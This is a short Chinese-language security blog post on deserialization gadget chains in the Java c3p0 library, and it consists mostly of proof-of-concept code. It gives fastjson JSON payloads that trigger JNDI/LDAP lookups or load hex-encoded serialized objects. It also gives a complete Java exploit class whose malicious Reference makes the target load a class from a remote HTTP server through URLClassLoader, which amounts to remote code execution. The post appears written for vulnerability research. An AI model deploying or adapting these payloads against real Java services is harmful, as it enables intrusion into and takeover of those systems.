fmyyy

C3P0

  • 2022-05-05
  • 作者 fmyyy
  • ~3.99K 字
  1. 1. c3p0
    1. 1.1. Gadget
      1. 1.1.1. jndi+fastjson
      2. 1.1.2. hex+fastjson
      3. 1.1.3. httpbase

c3p0

1
2
3
4
5
<dependency>
	<groupId>com.mchange</groupId>
	<artifactId>c3p0</artifactId>
	<version>0.9.5.2</version>
</dependency>

Gadget

jndi+fastjson

poc:

1
2
3
4
public static void main(String[] args) {
    String payload = "{\"@type\":\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\",\"jndiName\":\"ldap://127.0.0.1:1099/Calc\", \"loginTimeout\":0}";
    JSON.parse(payload);
}

com.mchange.v2.c3p0.JndiRefForwardingDataSource继承com.mchange.v2.c3p0.JndiRefDataSourceBase

最后是来到这

1651747953530.png

调用栈

1651748006400.png

地址在其com.mchange.v2.c3p0.JndiRefDataSourceBase的setJndiName被赋值

1651748049653.png

hex+fastjson

不出网的时候可以用这个gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
public static void main(String[] args) {
    String payload = "{\n" +
            "    \"a\": {\n" +
            "        \"@type\": \"java.lang.Class\",\n" +
            "        \"val\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +
            "    },\n" +
            "    \"b\": {\n" +
            "        \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +
            "        \"userOverridesAsString\": \"HexAsciiSerializedMap:hex编码内容;\"\n" +
            "    }\n" +
            "}";
    JSON.parse(payload);
}

终点在这

1651751502918.png

调用栈

1651751537378.png

httpbase

基于URLClassloader

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import com.mchange.v2.naming.ReferenceIndirector;

import javax.naming.Name;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.rmi.Naming;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

public class c3p {
    public static void main(String[] args) throws Exception{
        PoolBackedDataSourceBase a = new PoolBackedDataSourceBase(false);
        Class clazz = Class.forName("com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase");
        Field f1 = clazz.getDeclaredField("connectionPoolDataSource"); //此类是PoolBackedDataSourceBase抽象类的实现
        f1.setAccessible(true);
        f1.set(a,new evil());

        ObjectOutputStream ser = new ObjectOutputStream(new FileOutputStream(new File("a.bin")));
        ser.writeObject(a);
        ser.close();
        ObjectInputStream unser = new ObjectInputStream(new FileInputStream("a.bin"));
        unser.readObject();
        unser.close();
    }

    public static class evil implements ConnectionPoolDataSource, Referenceable {
        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

        @Override
        public Reference getReference() throws NamingException {
            return new Reference("evilexp","evilexp","http://127.0.0.1:10099/");
        }
    }
}

PoolBackedDataSource在序列化时可以序列化入一个任意Reference类,在PoolBackedDataSource反序列化时该Reference类中指定的对象会被URLClassLoader远程加载实例化。

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
最后编辑:2022-05-05